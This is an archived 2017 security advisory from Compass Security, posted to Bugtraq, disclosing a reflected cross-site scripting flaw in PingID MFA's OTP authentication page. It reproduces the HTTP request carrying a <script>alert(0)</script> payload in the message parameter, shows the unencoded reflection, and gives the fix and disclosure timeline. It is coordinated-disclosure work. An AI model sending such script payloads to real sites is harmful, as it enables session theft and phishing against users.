lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <44ad8ab969ea4c049c6a3a32c2471aea@Wapiti.compass-security.com>
Date: Wed, 17 May 2017 05:52:40 +0000
From: Advisories <advisories@...pass-security.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: PingID (MFA) - Reflected Cross-Site Scripting

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  PingID (MFA) [1]
# Vendor:   Ping Identity Corporation
# CSNC ID:  CSNC-2017-013
# Subject:   Reflected Cross-Site Scripting
# Risk:        High
# Effect:     Remotely exploitable
# Author:   Stephan Sekula <stephan.sekula@...pass-security.com>
# Date:      18.04.2017
#
#############################################################

Introduction:
-------------
With PingID MFA, you can easily control when your users need to authenticate with a
second factor. You can configure your policies based upon the following:
    Group - Require MFA for members of a specific group.
    Application - Require MFA for specific applications.
    Geofence - Require MFA if the user is outside a pre-set geofence.
    Rooted or Jailbroken device - Require MFA if the user's device is rooted or jailbroken.
    Network IP - Require MFA if the device isn't in a specific IP range.
PingID MFA delivers the granular security that your policies require with the ease
of use your users want. [1]

Compass Security discovered a web application security flaw in PingID's authentication
process, which allows an attacker to manipulate the resulting website. This allows,
for instance, attacking the user's browser or redirecting the user to a phishing website.


Technical Description
---------------------
During the authentication process, a message parameter is used, which can
be manipulated. If this parameter contains JavaScript code, it is executed
in the user's browser. Exploiting the vulnerability will lead to so-called
Cross-Site Scripting (XSS), allowing the execution of JavaScript in the
context of the victim.

Request:
POST /pingid/ppm/auth/otp HTTP/1.1
Host: authenticator.pingone.com
[CUT]
Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

otp=123456&message=<script>alert(0)</script>

Response:
HTTP/1.1 200 OK
Date: Thu, 13 Apr 2017 11:21:45 GMT
Server:
Cache-Control: no-cache, no-store
[CUT]
Connection: close
X-Content-Type-Options: nosniff
Content-Length: 8313

<!DOCTYPE html>
<html>
<head>
    [CUT]
</head>
<body>
[CUT]
    <div class="admin-message"><script>alert(0)</script></div>
[CUT]
</body>
</html>


Workaround / Fix:
-----------------
The vendor has addressed the vulnerability. In general, this issue can be fixed by
properly encoding all output, which is posted back to the user.
For instance, using HTML encoding, to convert < to &lt; and > to &gt;.


Timeline:
---------
2017-05-16:     Coordinated public disclosure date
2017-05-03:     Release of fixed version/patch
2017-04-20:     Initial vendor response
2017-04-19:     Initial vendor notification
2017-04-13:     Discovery by Stephan Sekula


References:
-----------
[1] https://www.pingidentity.com/en/products/pingid.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ